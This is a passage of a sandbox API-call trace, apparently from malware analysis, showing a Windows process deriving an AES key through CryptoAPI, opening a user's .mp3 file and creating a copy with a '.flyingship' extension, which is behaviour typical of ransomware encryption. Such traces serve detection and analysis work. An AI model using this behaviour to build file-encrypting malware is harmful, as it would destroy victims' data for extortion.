lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.033] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.033] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.034] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0186.034] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.034] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0186.034] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.034] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.034] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.034] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.034] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0186.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.034] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0186.035] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.035] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0186.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.036] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0186.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.036] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.036] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.037] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.037] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.037] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.037] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.037] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.038] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0186.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.038] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.038] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.038] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.070] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0186.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.070] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.070] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0186.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.070] CryptDestroyHash (hHash=0x90af58) returned 1 [0186.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.071] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.071] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.071] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.071] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\pkop0.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.072] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.072] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0186.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0186.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.073] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0186.073] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0186.073] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0186.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0186.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0186.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0186.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0186.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0186.075] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l")) returned 0x10 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0186.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0186.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\pkop0.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0186.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0186.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0186.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 